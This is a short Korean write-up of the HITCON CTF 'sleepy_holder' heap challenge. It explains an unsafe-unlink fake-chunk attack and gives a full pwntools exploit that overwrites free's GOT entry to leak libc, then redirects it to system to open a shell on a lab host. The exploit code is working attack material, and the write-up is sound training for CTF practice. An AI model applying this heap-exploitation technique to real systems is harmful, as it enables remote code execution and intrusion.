HITCON CTF sleepy_holder

sleepy_holder는 secret_holder랑 비슷한데 huge chunk를 한번할당할수있다.

요약을 하자면 got를 덮되, free(small) 이렇게 wipe하기때문에 small의 포인터를 조작하고 free를 puts로해서 puts(got) 식으로 릭을 한다.

unsafe_unlink로 fake chunk만들어서 하는 문제

from pwn import *
 
p = remote("10.211.55.3",11111)
 
 
def keep(select,data):
    print p.recvuntil("3. Renew secret")
    p.sendline("1")
    print p.recvuntil("\n")
    p.sendline(str(select))
    print p.recvuntil("secret:")
    p.sendline(data)
 
def wipe(select):
    print p.recvuntil("3. Renew secret")
    p.sendline("2")
    print p.recvuntil("secret")
    p.sendline(str(select))
 
def renew(select,data):
    print p.recvuntil("3. Renew secret")
    p.sendline("3")
    print p.recvuntil("secret")
    p.sendline(str(select))
    print p.recvuntil("secret:")
    p.send(data)
 
print p.recvuntil("Waking Sleepy Holder up ...")
 
puts = 0x400760
puts_got = 0x602020
atoi_got = 0x602080
free_got = 0x602018
exit_got = 0x602088
offset = 0x000000000039ea0
keep(1,"A")
keep(2,"B")
wipe(1)
keep(3,"A"*400)
wipe(1)
 
payload = p64(0)
payload += p64(0x21)
payload += p64(0x6020d0-24)
payload += p64(0x6020d0-16)
payload += p64(0x20)
keep(1,payload)
wipe(2)
 
#leak libc free(atoi_got)
renew(1,p64(0) + p64(free_got) + p64(atoi_got)*2 + p32(1) + p32(0)*2)
 
payload = p64(puts)
renew(2,payload)
 
wipe(1)
 
print p.recvuntil("2. Big secret")
libc_leak = p.recv(4)
libc_leak = u64(p.recv(6).ljust(8,'\x00'))
log.info("atoi_libc: " + hex(libc_leak))
image_base = libc_leak - offset
one_shot = image_base + 0xE66BD
libc_system = image_base + 0x46590
binsh = image_base + 0x46483 
log.info("libc_base: " + hex(image_base))
log.info("libc_system: " + hex(libc_system))
 
renew(2,p64(libc_system))
keep(3,'a')
wipe(2)
keep(2,"/bin/sh")
wipe(2)
p.interactive()